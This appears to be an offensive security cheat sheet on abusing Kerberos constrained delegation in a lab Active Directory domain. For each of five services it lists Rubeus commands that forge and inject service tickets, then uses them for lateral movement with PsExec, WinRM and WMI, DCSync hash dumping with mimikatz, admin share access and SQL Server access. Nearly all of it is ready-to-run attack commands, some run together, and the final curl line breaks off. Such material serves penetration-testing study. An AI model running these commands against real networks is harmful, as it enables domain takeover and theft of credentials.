Service Tickets and Abuses
1. Service Ticket for HOST (Lateral Movement with PsExec, wmi, winrm)
The HOST service ticket can be used for lateral movement by accessing remote services like PsExec. PsExec allows you to run commands on remote systems.
Steps:
Obtain the HOST service ticket:
C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:host /user:sql-1$ /ticket:<base64TGT> /nowrapSave the service ticket to a file:
C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbiInject the ticket using Rubeus:
C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbiUse PsExec to run commands on the target system:
C:\Users\Alex> psexec.exe \\dc.dev.dhitalcorp.local cmdAccess WinRM:
C:\Users\Alex> Enter-PSSession -ComputerName dc.dev.dhitalcorp.local -Credential (New-Object System.Management.Automation.PSCredential('dev\alex', (ConvertTo-SecureString "password" -AsPlainText -Force)))Access WMI:
C:\Users\Alex> Get-WmiObject -Class Win32_OperatingSystem -ComputerName dc.dev.dhitalcorp.local -Credential (New-Object System.Management.Automation.PSCredential('dev\alex', (ConvertTo-SecureString "password" -AsPlainText -Force)))
2. Service Ticket for LDAP (DC Sync Attack)
The LDAP service ticket can be used for Directory Replication Service (DC Sync) attacks. This allows you to replicate password hashes from a Domain Controller.
Steps:
Obtain the LDAP service ticket:
C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:ldap /user:sql-1$ /ticket:<base64TGT> /nowrapSave the service ticket to a file:
C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbiInject the ticket using Rubeus:
C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbiPerform the DC Sync attack using mimikatz:
C:\Users\Alex> mimikatz.exe mimikatz # lsadump::dcsync /user:dc$
3. Service Ticket for CIFS (File Share Access)
The CIFS service ticket allows you to access file shares on a remote system, enabling you to read, write, or modify files on the target.
Steps:
Obtain the CIFS service ticket:
C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /user:sql-1$ /ticket:<base64TGT> /nowrapSave the service ticket to a file:
C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbiInject the ticket using Rubeus:
C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbiAccess the file share:
C:\Users\Alex> net use \\dc.dev.dhitalcorp.local\c$
4. Service Ticket for MSSQLSvc (SQL Server Access)
The MSSQLSvc service ticket can be used to access SQL Server instances, allowing you to run queries and potentially extract data.
Steps:
Obtain the MSSQLSvc service ticket:
C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:mssqlsvc /user:sql-1$ /ticket:<base64TGT> /nowrapSave the service ticket to a file:
C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbiInject the ticket using Rubeus:
C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbiAccess the SQL Server:
C:\Users\Alex> sqlcmd -S dc.dev.dhitalcorp.local -d master -U alex -P <password>
5. Service Ticket for HTTP (Web Service Access)
The HTTP service ticket can be used to access web applications running on the target system, allowing for interactions with the web services as the impersonated user.
Steps:
Obtain the HTTP service ticket:
C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:http /user:sql-1$ /ticket:<base64TGT> /nowrapSave the service ticket to a file:
C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbiInject the ticket using Rubeus:
C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbiAccess the web application:
You can use tools like
curlor a browser to access the web service:C:\Users\Alex> curl -H "Authorization: Negotiate <base64ServiceTicket>" http://dc.dev.dhi
Last updated